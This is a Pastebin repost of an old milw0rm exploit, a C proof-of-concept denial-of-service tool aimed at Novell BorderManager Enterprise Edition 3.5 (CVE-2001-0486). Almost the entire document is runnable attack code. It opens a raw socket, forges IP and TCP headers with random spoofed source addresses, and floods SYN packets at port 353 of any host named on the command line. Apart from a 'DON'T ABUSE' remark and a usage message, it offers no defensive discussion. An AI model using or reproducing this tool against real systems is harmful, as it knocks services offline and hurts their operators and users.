Advertisement
FlyFar

Novell BorderManager Enterprise Edition 3.5 - Denial of Service - CVE-2001-0486

Feb 24th, 2024
704
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.42 KB | Cybersecurity | 0 0
  1. /* 29.4.2001 honoriak@mail.ru
  2.    Proof of concept DoS Novell BorderManager Enterprise Edition 3.5
  3.    helisec
  4.    DoSs are lame, i know, but boredom is ugly. DON'T ABUSE.
  5.    greets: jimjones, doing, darkcode for his paper about raw sockets
  6.    and all helisec guys.
  7. */
  8.  
  9. #include <stdio.h>
  10. #include <string.h>
  11. #include <unistd.h>
  12. #include <time.h>  
  13. #include <sys/types.h>
  14. #include <sys/stat.h>
  15. #include <sys/socket.h>
  16. #include <netdb.h>
  17. #include <arpa/inet.h>
  18. #include <netinet/in.h>
  19. #include <netinet/ip.h>
  20.  
  21. #define __FAVOR_BSD
  22. #include <netinet/tcp.h>
  23.  
  24. #define PORT 353
  25.  
  26.  /* to be easier the processing, this struct :) */
  27.  
  28.  struct pseudohdr {
  29.          struct in_addr saddr;
  30.          struct in_addr daddr;
  31.          u_char zero;
  32.          u_char protocol;
  33.          u_short len;
  34.          struct tcphdr tcpheader;
  35.      }pseudoh;
  36.                                    
  37.  
  38. unsigned long resolve(name)  
  39.     char *name;
  40.  {
  41.  
  42. struct in_addr h2;
  43. struct hostent *hname;
  44.  
  45. if (!(hname = gethostbyname(name))) return(0);
  46. memcpy((char *)&h2.s_addr, hname->h_addr, hname->h_length);
  47. return(h2.s_addr);
  48. }
  49.                
  50.  /* checksum ripped and modified by me */
  51.  
  52. u_short
  53. checksum (data, length)
  54.     u_short *data;
  55.     u_short length;
  56. {
  57.  
  58. register long value;
  59. u_short i;
  60.    
  61.       for (i = 0; i < (length >> 1); i++)
  62.        value += data[i];
  63.          
  64.        if ((length & 1) == 1)
  65.        value += (data[i] << 8);
  66.                
  67.        value = (value & 65535) + (value >> 16);
  68.                  
  69.        return (~value);
  70. }
  71.                    
  72.  
  73. void packet(vic, socket)
  74.     struct sockaddr_in *vic;
  75.     int socket;
  76.  {
  77.  
  78.  int count;
  79.  char buf[40];
  80.                      
  81.  struct ip *ipheader = (struct ip *)buf;
  82.  struct tcphdr *tcpheader = (struct tcphdr *)(buf + sizeof(struct ip));
  83.  
  84.  bzero (&buf, (sizeof(struct ip) + sizeof(struct tcphdr)) );
  85.  
  86.     /* filling ip struct */
  87.    
  88.     ipheader->ip_v = IPVERSION;
  89.     ipheader->ip_hl = 5;
  90.     ipheader->ip_tos = htons(0);
  91.     ipheader->ip_len = htons(sizeof(buf));
  92.     ipheader->ip_id = rand() % 0xffff;
  93.     ipheader->ip_off = htons(0);
  94.     ipheader->ip_ttl = 0xff;  /* 255 hex */
  95.     ipheader->ip_p = IPPROTO_TCP;
  96.     ipheader->ip_src.s_addr = rand();
  97.     ipheader->ip_dst.s_addr = vic->sin_addr.s_addr;
  98.     ipheader->ip_sum = 0;
  99.    
  100.     /* filling tcphdr struct */
  101.    
  102.     tcpheader->th_sport = 2424; /* random */
  103.     tcpheader->th_dport = vic->sin_port;
  104.     tcpheader->th_seq = htonl(0xF1C); /* random */
  105.     tcpheader->th_ack = 0;
  106.     tcpheader->th_off = 5;
  107.     tcpheader->th_flags = TH_SYN; /* the important flag */
  108.     tcpheader->th_win = 4096;
  109.     tcpheader->th_sum = 0;  
  110.    
  111.  
  112.  bzero (&pseudoh, 12 + sizeof(struct tcphdr));
  113.  pseudoh.saddr.s_addr = rand();
  114.  pseudoh.daddr.s_addr = vic->sin_addr.s_addr;
  115.  pseudoh.protocol = 6;
  116.  pseudoh.len = htons (sizeof(struct tcphdr));
  117.  memcpy((char *)&pseudoh.tcpheader, (char *)tcpheader, sizeof (struct tcphdr));
  118.  tcpheader->th_sum = checksum((u_short *)&pseudoh, 12 + sizeof (struct tcphdr));
  119.  
  120.  /* sending packets, DON'T ABUSE! */
  121.  
  122. for (count = 0; count < 260; count++) {
  123.   if ( (sendto(socket,
  124.        buf,
  125.        (sizeof(struct iphdr) + sizeof(struct tcphdr)),
  126.        0,
  127.        (struct sockaddr *)vic,
  128.        sizeof(struct sockaddr_in))) < 0) {
  129.        fprintf(stderr, "Error sending packets\n");
  130.            exit(-1);
  131.            }              
  132.       }                                                                                    
  133. close (socket);
  134.   }
  135.  
  136. void usage(proggy)
  137.     char *proggy;
  138.  {
  139.     fprintf(stderr,"DoS a Novell BorderManager Enterprise Edition 3.5\n");
  140.     fprintf(stderr, "honoriak@mail.ru from helisec\n");
  141.     fprintf(stderr, "Usage: %s host\n", proggy);
  142.     exit(0);
  143.     }
  144.  
  145. main(argc, argv)
  146.     int argc;
  147.     char *argv[];
  148.    
  149.  {
  150.  
  151.   struct sockaddr_in h;
  152.   int s0ck, uno = 1;
  153.  
  154.   if (argc < 2)
  155.     {
  156.     usage(argv[0]);
  157.     }
  158.    
  159.   bzero(&h, sizeof(h));
  160.   h.sin_family = AF_INET;  
  161.   h.sin_port = htons(PORT);
  162.  
  163. if ( (inet_pton(AF_INET, argv[1], &h.sin_addr)) <= 0)
  164.     {
  165.     h.sin_addr.s_addr = resolve(argv[1]);
  166.     }
  167.    
  168. if (!h.sin_addr.s_addr) {
  169.     fprintf(stderr, "Error resolving host\n");
  170.     exit(-1);
  171.     }
  172.    
  173. if ((s0ck = socket(AF_INET, SOCK_RAW, 255)) < 0) {
  174.         fprintf(stderr, "Error creating raw socket, root is needed\n");
  175.         exit (-1);
  176.         }
  177.  
  178. setsockopt(s0ck, SOL_SOCKET, SO_BROADCAST, &uno, sizeof(uno));
  179.  
  180. packet(&h, s0ck);
  181. fprintf(stderr, "DoS completed.\n");
  182. exit(0);
  183. }
  184.  
  185.  
  186. // milw0rm.com [2001-05-07]
  187.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement